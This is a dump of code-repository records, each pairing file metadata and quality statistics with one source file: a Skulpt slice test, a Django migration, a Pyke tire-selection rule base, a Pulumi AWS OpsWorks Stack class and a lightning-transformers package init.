| 13,569
| 135,717
| 6.415285
| 0.043703
| 0.088961
| 0.121311
| 0.153661
| 0.945238
| 0.944698
| 0.940195
| 0.940195
| 0.806396
| 0.806396
| 0
| 0.100138
| 0.219597
| 135,717
| 3,741
| 124
| 36.278268
| 0.721746
| 0.000744
| 0
| 0.703599
| 0
| 0
| 0.240024
| 0.082142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001252
| 0
| 0.170266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
4671d2ff32c950a2bd16767249973665ffcc7da7 | 19 | py | Python | test/run/t32.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | ["MIT"] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t32.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | ["MIT"] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t32.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | ["MIT"] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z |
print "1234"[-3:3]
| 9.5
| 18
| 0.578947
| 4
| 19
| 2.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.352941
| 0.105263
| 19
| 1
| 19
| 19
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0 | 7 |
d3be5d6b837c2a0c081f3148cd7bf9622937d1b8 | 1,360 | py | Python | bakerydemo/base/migrations/0006_char_field_remove_null.py | l-etabli/bakerydemo | 0a03c00eaf6ce70842f92d1f508da6337f9be523 | ["BSD-3-Clause"] | null | null | null | bakerydemo/base/migrations/0006_char_field_remove_null.py | l-etabli/bakerydemo | 0a03c00eaf6ce70842f92d1f508da6337f9be523 | ["BSD-3-Clause"] | null | null | null | bakerydemo/base/migrations/0006_char_field_remove_null.py | l-etabli/bakerydemo | 0a03c00eaf6ce70842f92d1f508da6337f9be523 | ["BSD-3-Clause"] | null | null | null |
# Generated by Django 3.2.10 on 2021-12-26 06:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0005_formfield_clean_name'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='featured_section_1_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='featured_section_2_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='featured_section_3_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='promo_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
]
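# Hedged usage note (not part of the generated migration): in a standard Django
# checkout of bakerydemo, the SQL these AlterField operations would emit can be
# previewed before applying them, e.g.
#     python manage.py sqlmigrate base 0006_char_field_remove_null
#     python manage.py migrate base
# preserve_default=False means the default='' is used only while the migration
# runs and is not recorded as the field's ongoing default in migration state.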
| 35.789474
| 126
| 0.620588
| 151
| 1,360
| 5.397351
| 0.337748
| 0.09816
| 0.122699
| 0.142331
| 0.806135
| 0.806135
| 0.806135
| 0.806135
| 0.737423
| 0.737423
| 0
| 0.035354
| 0.272059
| 1,360
| 37
| 127
| 36.756757
| 0.787879
| 0.033824
| 0
| 0.645161
| 1
| 0
| 0.222561
| 0.073933
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
317aa96cacf8abc568acb2768b940f4263473e37 | 10,406 | py | Python | Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | ["MIT"] | null | null | null | Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | ["MIT"] | 1 | 2022-02-11T07:26:54.000Z | 2022-02-11T07:26:54.000Z | Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | ["MIT"] | null | null | null |
# bc_moto_rules_questions_bc.py
from pyke import contexts, pattern, bc_rule
pyke_version = '1.1.1'
compiler_version = 1
def rain_1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.rain_1: got unexpected plan from when clause 1"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def rain_2(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.rain_2: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'humidity', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.rain_2: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def slick(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.slick: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'humidity', context,
(rule.pattern(0),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.slick: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def soft(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.soft: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.soft: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def medium_1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.medium_1: got unexpected plan from when clause 1"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def medium_2(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.medium_2: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.medium_2: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def hard(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.hard: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.hard: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def populate(engine):
This_rule_base = engine.get_create('bc_moto_rules_questions')
bc_rule.bc_rule('rain_1', This_rule_base, 'select_type',
rain_1, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(True),))
bc_rule.bc_rule('rain_2', This_rule_base, 'select_type',
rain_2, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(False),
pattern.pattern_literal(True),))
bc_rule.bc_rule('slick', This_rule_base, 'select_type',
slick, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(False),))
bc_rule.bc_rule('soft', This_rule_base, 'select_tires',
soft, None,
(pattern.pattern_literal('Soft'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(3),))
bc_rule.bc_rule('medium_1', This_rule_base, 'select_tires',
medium_1, None,
(pattern.pattern_literal('Slick_Medium'),),
(),
(pattern.pattern_literal(False),))
bc_rule.bc_rule('medium_2', This_rule_base, 'select_tires',
medium_2, None,
(pattern.pattern_literal('Slick_Medium'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(2),))
bc_rule.bc_rule('hard', This_rule_base, 'select_tires',
hard, None,
(pattern.pattern_literal('Hard'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(1),))
Krb_filename = '..\\bc_moto_rules_questions.krb'
Krb_lineno_map = (
((14, 18), (5, 5)),
((20, 25), (7, 7)),
((38, 42), (11, 11)),
((44, 49), (13, 13)),
((50, 55), (14, 14)),
((68, 72), (18, 18)),
((74, 79), (20, 20)),
((80, 85), (21, 21)),
((98, 102), (25, 25)),
((104, 109), (27, 27)),
((110, 115), (28, 28)),
((128, 132), (32, 32)),
((134, 139), (34, 34)),
((152, 156), (38, 38)),
((158, 163), (40, 40)),
((164, 169), (41, 41)),
((182, 186), (45, 45)),
((188, 193), (47, 47)),
((194, 199), (48, 48)),
)
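# Illustrative driver (an editorial sketch, not part of the generated module).
# It assumes the standard Pyke API and uses the rule-base / goal names that
# populate() registers above; proving these goals walks the 'moto_questions'
# question base (windy, wind_direction, ...) interactively.
if __name__ == '__main__':
    from pyke import knowledge_engine
    # Compile and load the .krb/.kqb sources found next to the driver script.
    engine = knowledge_engine.engine(__file__)
    engine.activate('bc_moto_rules_questions')
    # select_tires/1 is the goal the tire rules above conclude.
    vars, plan = engine.prove_1_goal(
        'bc_moto_rules_questions.select_tires($tires)')
    print(vars['tires'])  # e.g. 'Soft', 'Slick_Medium' or 'Hard'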
| 37.431655
| 92
| 0.536998
| 1,249
| 10,406
| 4.197758
| 0.103283
| 0.05493
| 0.064085
| 0.06008
| 0.914934
| 0.884036
| 0.862865
| 0.840549
| 0.815373
| 0.772649
| 0
| 0.042715
| 0.354315
| 10,406
| 277
| 93
| 37.566787
| 0.73761
| 0.002787
| 0
| 0.735409
| 0
| 0
| 0.127422
| 0.040675
| 0
| 0
| 0
| 0
| 0.046693
| 1
| 0.031128
| false
| 0
| 0.003891
| 0
| 0.035019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31a35d016a45ce93f1ae9ea8eceb599a44c1dbf0
| 17,542
|
py
|
Python
|
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Stack(pulumi.CustomResource):
agent_version: pulumi.Output[str]
"""
If set to `"LATEST"`, OpsWorks will automatically install the latest version.
"""
arn: pulumi.Output[str]
berkshelf_version: pulumi.Output[str]
"""
If `manage_berkshelf` is enabled, the version of Berkshelf to use.
"""
color: pulumi.Output[str]
"""
Color to paint next to the stack's resources in the OpsWorks console.
"""
configuration_manager_name: pulumi.Output[str]
"""
Name of the configuration manager to use. Defaults to "Chef".
"""
configuration_manager_version: pulumi.Output[str]
"""
Version of the configuration manager to use. Defaults to "11.4".
"""
custom_cookbooks_sources: pulumi.Output[list]
"""
When `use_custom_cookbooks` is set, provide this sub-object as
described below.
* `password` (`str`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`str`) - For sources that are version-aware, the revision to use.
* `sshKey` (`str`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`str`) - The type of source to use. For example, "archive".
* `url` (`str`) - The URL where the cookbooks resource can be found.
* `username` (`str`) - Username to use when authenticating to the source.
"""
custom_json: pulumi.Output[str]
"""
Custom JSON attributes to apply to the entire stack.
"""
default_availability_zone: pulumi.Output[str]
"""
Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
"""
default_instance_profile_arn: pulumi.Output[str]
"""
The ARN of an IAM Instance Profile that created instances
will have by default.
"""
default_os: pulumi.Output[str]
"""
Name of OS that will be installed on instances by default.
"""
default_root_device_type: pulumi.Output[str]
"""
Name of the type of root device instances will have by default.
"""
default_ssh_key_name: pulumi.Output[str]
"""
Name of the SSH keypair that instances will have by default.
"""
default_subnet_id: pulumi.Output[str]
"""
Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
"""
hostname_theme: pulumi.Output[str]
"""
Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
"""
manage_berkshelf: pulumi.Output[bool]
"""
Boolean value controlling whether Opsworks will run Berkshelf for this stack.
"""
name: pulumi.Output[str]
"""
The name of the stack.
"""
region: pulumi.Output[str]
"""
The name of the region where the stack will exist.
"""
service_role_arn: pulumi.Output[str]
"""
The ARN of an IAM role that the OpsWorks service will act as.
"""
stack_endpoint: pulumi.Output[str]
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
use_custom_cookbooks: pulumi.Output[bool]
"""
Boolean value controlling whether the custom cookbook settings are
enabled.
"""
use_opsworks_security_groups: pulumi.Output[bool]
"""
Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
"""
vpc_id: pulumi.Output[str]
"""
The id of the VPC that this stack belongs to.
"""
def __init__(__self__, resource_name, opts=None, agent_version=None, berkshelf_version=None, color=None, configuration_manager_name=None, configuration_manager_version=None, custom_cookbooks_sources=None, custom_json=None, default_availability_zone=None, default_instance_profile_arn=None, default_os=None, default_root_device_type=None, default_ssh_key_name=None, default_subnet_id=None, hostname_theme=None, manage_berkshelf=None, name=None, region=None, service_role_arn=None, tags=None, use_custom_cookbooks=None, use_opsworks_security_groups=None, vpc_id=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an OpsWorks stack resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] agent_version: If set to `"LATEST"`, OpsWorks will automatically install the latest version.
:param pulumi.Input[str] berkshelf_version: If `manage_berkshelf` is enabled, the version of Berkshelf to use.
:param pulumi.Input[str] color: Color to paint next to the stack's resources in the OpsWorks console.
:param pulumi.Input[str] configuration_manager_name: Name of the configuration manager to use. Defaults to "Chef".
:param pulumi.Input[str] configuration_manager_version: Version of the configuration manager to use. Defaults to "11.4".
:param pulumi.Input[list] custom_cookbooks_sources: When `use_custom_cookbooks` is set, provide this sub-object as
described below.
:param pulumi.Input[str] custom_json: Custom JSON attributes to apply to the entire stack.
:param pulumi.Input[str] default_availability_zone: Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
:param pulumi.Input[str] default_instance_profile_arn: The ARN of an IAM Instance Profile that created instances
will have by default.
:param pulumi.Input[str] default_os: Name of OS that will be installed on instances by default.
:param pulumi.Input[str] default_root_device_type: Name of the type of root device instances will have by default.
:param pulumi.Input[str] default_ssh_key_name: Name of the SSH keypair that instances will have by default.
:param pulumi.Input[str] default_subnet_id: Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
:param pulumi.Input[str] hostname_theme: Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
:param pulumi.Input[bool] manage_berkshelf: Boolean value controlling whether Opsworks will run Berkshelf for this stack.
:param pulumi.Input[str] name: The name of the stack.
:param pulumi.Input[str] region: The name of the region where the stack will exist.
:param pulumi.Input[str] service_role_arn: The ARN of an IAM role that the OpsWorks service will act as.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[bool] use_custom_cookbooks: Boolean value controlling whether the custom cookbook settings are
enabled.
:param pulumi.Input[bool] use_opsworks_security_groups: Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
:param pulumi.Input[str] vpc_id: The id of the VPC that this stack belongs to.
The **custom_cookbooks_sources** object supports the following:
* `password` (`pulumi.Input[str]`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`pulumi.Input[str]`) - For sources that are version-aware, the revision to use.
* `sshKey` (`pulumi.Input[str]`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`pulumi.Input[str]`) - The type of source to use. For example, "archive".
* `url` (`pulumi.Input[str]`) - The URL where the cookbooks resource can be found.
* `username` (`pulumi.Input[str]`) - Username to use when authenticating to the source.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['agent_version'] = agent_version
__props__['berkshelf_version'] = berkshelf_version
__props__['color'] = color
__props__['configuration_manager_name'] = configuration_manager_name
__props__['configuration_manager_version'] = configuration_manager_version
__props__['custom_cookbooks_sources'] = custom_cookbooks_sources
__props__['custom_json'] = custom_json
__props__['default_availability_zone'] = default_availability_zone
if default_instance_profile_arn is None:
raise TypeError("Missing required property 'default_instance_profile_arn'")
__props__['default_instance_profile_arn'] = default_instance_profile_arn
__props__['default_os'] = default_os
__props__['default_root_device_type'] = default_root_device_type
__props__['default_ssh_key_name'] = default_ssh_key_name
__props__['default_subnet_id'] = default_subnet_id
__props__['hostname_theme'] = hostname_theme
__props__['manage_berkshelf'] = manage_berkshelf
__props__['name'] = name
if region is None:
raise TypeError("Missing required property 'region'")
__props__['region'] = region
if service_role_arn is None:
raise TypeError("Missing required property 'service_role_arn'")
__props__['service_role_arn'] = service_role_arn
__props__['tags'] = tags
__props__['use_custom_cookbooks'] = use_custom_cookbooks
__props__['use_opsworks_security_groups'] = use_opsworks_security_groups
__props__['vpc_id'] = vpc_id
__props__['arn'] = None
__props__['stack_endpoint'] = None
super(Stack, __self__).__init__(
'aws:opsworks/stack:Stack',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, agent_version=None, arn=None, berkshelf_version=None, color=None, configuration_manager_name=None, configuration_manager_version=None, custom_cookbooks_sources=None, custom_json=None, default_availability_zone=None, default_instance_profile_arn=None, default_os=None, default_root_device_type=None, default_ssh_key_name=None, default_subnet_id=None, hostname_theme=None, manage_berkshelf=None, name=None, region=None, service_role_arn=None, stack_endpoint=None, tags=None, use_custom_cookbooks=None, use_opsworks_security_groups=None, vpc_id=None):
"""
Get an existing Stack resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] agent_version: If set to `"LATEST"`, OpsWorks will automatically install the latest version.
:param pulumi.Input[str] berkshelf_version: If `manage_berkshelf` is enabled, the version of Berkshelf to use.
:param pulumi.Input[str] color: Color to paint next to the stack's resources in the OpsWorks console.
:param pulumi.Input[str] configuration_manager_name: Name of the configuration manager to use. Defaults to "Chef".
:param pulumi.Input[str] configuration_manager_version: Version of the configuration manager to use. Defaults to "11.4".
:param pulumi.Input[list] custom_cookbooks_sources: When `use_custom_cookbooks` is set, provide this sub-object as
described below.
:param pulumi.Input[str] custom_json: Custom JSON attributes to apply to the entire stack.
:param pulumi.Input[str] default_availability_zone: Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
:param pulumi.Input[str] default_instance_profile_arn: The ARN of an IAM Instance Profile that created instances
will have by default.
:param pulumi.Input[str] default_os: Name of OS that will be installed on instances by default.
:param pulumi.Input[str] default_root_device_type: Name of the type of root device instances will have by default.
:param pulumi.Input[str] default_ssh_key_name: Name of the SSH keypair that instances will have by default.
:param pulumi.Input[str] default_subnet_id: Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
:param pulumi.Input[str] hostname_theme: Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
:param pulumi.Input[bool] manage_berkshelf: Boolean value controlling whether Opsworks will run Berkshelf for this stack.
:param pulumi.Input[str] name: The name of the stack.
:param pulumi.Input[str] region: The name of the region where the stack will exist.
:param pulumi.Input[str] service_role_arn: The ARN of an IAM role that the OpsWorks service will act as.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[bool] use_custom_cookbooks: Boolean value controlling whether the custom cookbook settings are
enabled.
:param pulumi.Input[bool] use_opsworks_security_groups: Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
:param pulumi.Input[str] vpc_id: The id of the VPC that this stack belongs to.
The **custom_cookbooks_sources** object supports the following:
* `password` (`pulumi.Input[str]`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`pulumi.Input[str]`) - For sources that are version-aware, the revision to use.
* `sshKey` (`pulumi.Input[str]`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`pulumi.Input[str]`) - The type of source to use. For example, "archive".
* `url` (`pulumi.Input[str]`) - The URL where the cookbooks resource can be found.
* `username` (`pulumi.Input[str]`) - Username to use when authenticating to the source.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["agent_version"] = agent_version
__props__["arn"] = arn
__props__["berkshelf_version"] = berkshelf_version
__props__["color"] = color
__props__["configuration_manager_name"] = configuration_manager_name
__props__["configuration_manager_version"] = configuration_manager_version
__props__["custom_cookbooks_sources"] = custom_cookbooks_sources
__props__["custom_json"] = custom_json
__props__["default_availability_zone"] = default_availability_zone
__props__["default_instance_profile_arn"] = default_instance_profile_arn
__props__["default_os"] = default_os
__props__["default_root_device_type"] = default_root_device_type
__props__["default_ssh_key_name"] = default_ssh_key_name
__props__["default_subnet_id"] = default_subnet_id
__props__["hostname_theme"] = hostname_theme
__props__["manage_berkshelf"] = manage_berkshelf
__props__["name"] = name
__props__["region"] = region
__props__["service_role_arn"] = service_role_arn
__props__["stack_endpoint"] = stack_endpoint
__props__["tags"] = tags
__props__["use_custom_cookbooks"] = use_custom_cookbooks
__props__["use_opsworks_security_groups"] = use_opsworks_security_groups
__props__["vpc_id"] = vpc_id
return Stack(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
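# Illustrative usage (an editorial sketch, not part of the generated SDK file).
# The constructor above requires `region`, `service_role_arn` and
# `default_instance_profile_arn`; every value below, including the ARNs, is a
# placeholder.
#
#     import pulumi_aws as aws
#
#     main = aws.opsworks.Stack(
#         "main",
#         name="example-stack",
#         region="us-west-2",
#         service_role_arn="arn:aws:iam::123456789012:role/opsworks-service-role",
#         default_instance_profile_arn="arn:aws:iam::123456789012:instance-profile/opsworks-instance",
#         default_availability_zone="us-west-2a",
#         tags={"Name": "example-stack"})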
| 58.473333
| 616
| 0.702485
| 2,293
| 17,542
| 5.101614
| 0.096816
| 0.052659
| 0.055052
| 0.055223
| 0.842281
| 0.82356
| 0.813301
| 0.801419
| 0.772012
| 0.75842
| 0
| 0.00073
| 0.219587
| 17,542
| 299
| 617
| 58.668896
| 0.853762
| 0.413465
| 0
| 0.017241
| 1
| 0
| 0.165116
| 0.059504
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0.008621
| 0.051724
| 0.017241
| 0.327586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31afcef7b61a4db598678181d80bd2561859086b
| 265
|
py
|
Python
|
lightning_transformers/core/__init__.py
|
maksym-taranukhin/lightning-transformers
|
aa7202657973b5b65c3c36eb745621043859ebc4
|
[
"Apache-2.0"
] | 451
|
2021-04-21T15:53:59.000Z
|
2022-03-29T10:39:45.000Z
|
lightning_transformers/core/__init__.py
|
mathemusician/lightning-transformers
|
b2ef06113433e6a178ce4d3c9df7ede8064e247f
|
[
"Apache-2.0"
] | 92
|
2021-04-21T18:42:58.000Z
|
2022-03-30T05:29:54.000Z
|
lightning_transformers/core/__init__.py
|
mathemusician/lightning-transformers
|
b2ef06113433e6a178ce4d3c9df7ede8064e247f
|
[
"Apache-2.0"
] | 51
|
2021-04-22T05:35:28.000Z
|
2022-03-17T13:08:12.000Z
|
from lightning_transformers.core.data import TransformerDataModule # noqa: F401
from lightning_transformers.core.finetuning import TransformersBaseFinetuning # noqa: F401
from lightning_transformers.core.model import LitTransformer, TaskTransformer # noqa: F401
| 66.25
| 91
| 0.856604
| 28
| 265
| 8
| 0.5
| 0.174107
| 0.334821
| 0.388393
| 0.330357
| 0.330357
| 0
| 0
| 0
| 0
| 0
| 0.0375
| 0.09434
| 265
| 3
| 92
| 88.333333
| 0.895833
| 0.120755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
